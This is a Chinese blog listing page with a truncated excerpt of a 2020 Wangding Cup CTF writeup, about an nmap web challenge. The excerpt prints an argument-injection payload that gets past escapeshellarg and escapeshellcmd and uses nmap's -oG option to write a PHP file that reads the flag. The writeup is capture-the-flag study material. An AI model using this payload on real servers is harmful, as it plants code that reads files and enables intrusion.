MoR03r
MoR03r's Blog
首页
文章
2020网鼎杯-朱雀组部分题目Writeup
发表于 2020-5-18 |
CTF
Web 0x00 nmap Buu平台上一个题目, 原wp链接:https://blog.csdn.net/qq_26406447/article/details/100711933 使用使用nmap -oG参数写文件需要绕过 escapeshellarg和escapeshellcmd 写入payload: ' <? echo `cat /flag`;?> -oG hack.phtml ' 寻找文件位置,发现在根目录下,直接就能访问,获得flag 0x01 think_j...
阅读全文>>
TOP